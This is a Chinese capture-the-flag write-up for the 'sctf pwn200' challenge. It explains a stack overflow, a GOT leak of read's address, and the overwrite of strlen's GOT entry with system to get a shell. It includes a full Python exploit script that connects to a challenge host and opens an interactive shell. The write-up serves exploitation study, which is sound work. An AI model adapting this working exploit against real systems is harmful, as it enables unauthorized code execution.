sctf pwn200

　　题目给出了pwn200和libc.so。使用IDA查看程序，发现逻辑很简单。

　　使用checksec查看pwn200的安全属性，如下图：

　　发现NX enabled，No PIE。

　　在第一次读（0x08048524位置）的时候，可以读取17个字节，观察栈结构：

　　发现可以将nbytes覆盖，可以覆盖为0xff。

　　在第二次读（0x08048596位置）的时候，可以覆盖程序的返回地址至“08048507 call _write”，并且构造栈参数（为了泄露库函数的虚拟地址）。如下：

　　这样程序一返回（080485C1 retn）就执行write库函数，通过GOT泄露出某个库函数（这里可以泄露read的虚拟地址）的虚拟地址，从而通过IDA查看libc.so中system的位置和read的位置差，可以计算出system的虚拟地址。

　　紧接着会第三次读（0x08048524位置），这个读到内存的位置是：ebp+buf即ebp-0x1C，那么我们可以通过在第二次读的时候构造理想的ebp，使得我们能够将覆盖GOT中strlen库函数的虚拟地址，覆盖为system的虚拟地址；同时，将buf开始处存储/bin/sh。这样在进行接下来的strlen函数调用时，相当于执行system("/bin/sh")，因此获得shell。

　　exploit是来自http://www.imsebao.com/。思路很清晰，我稍加注释。

from socket import *

from struct import *

import time

#remote

'''

readOffset = 0x000de3a0

systOffset = 0x0003f430

'''

#local

readOffset = 0x000bdd20

systOffset = 0x00039100

param = '/bin/sh\x00' + 'ls home' + 'a'*5#'ls home' and 'a'*5 are paddings so that to override 0x08049858

#0x08049858 is strlen's address

s = socket(AF_INET, SOCK_STREAM)

s.connect(('192.168.200.7', 10001))

#construct name，override nbytes to \xff

name = 'syclover'+ '\x00' + 'abcdefg' + '\xFF'

# input name:

print s.recv(1024)

s.send(name)

showReadGot = 'A'*156

showReadGot += pack('<I', 0x08049860)#why 0x08049860? we want to override 0x08049858 to syst

showReadGot += pack('<I', 0x08048507)#override ret to call write

showReadGot += pack('<I', 1)#stdout

showReadGot += pack('<I', 0x08049850)#src,read's got

showReadGot += pack('<I', 4)#num

# input slogan:

print s.recv(1024)

s.send(showReadGot)

read = s.recv(1024)[-4:]#leak read's virtual address in process

viraddr_read = unpack('<I', read)[0]

print 'viraddr_read: %x' % viraddr_read

syst = viraddr_read - readOffset + systOffset

print 'system: %x' % syst

exploit = param + pack('<I', syst)

s.send(exploit)

while True:

    s.send(raw_input('$ ') + '\n')

    time.sleep(0.5)

    print s.recv(1024)

　　总体思路，信息泄露（通过write）获取system的线性地址；任意地址写（通过read）修改GOT中strlen库函数的地址为system的线性地址。

巴特西

sctf pwn200

最新文章

热门文章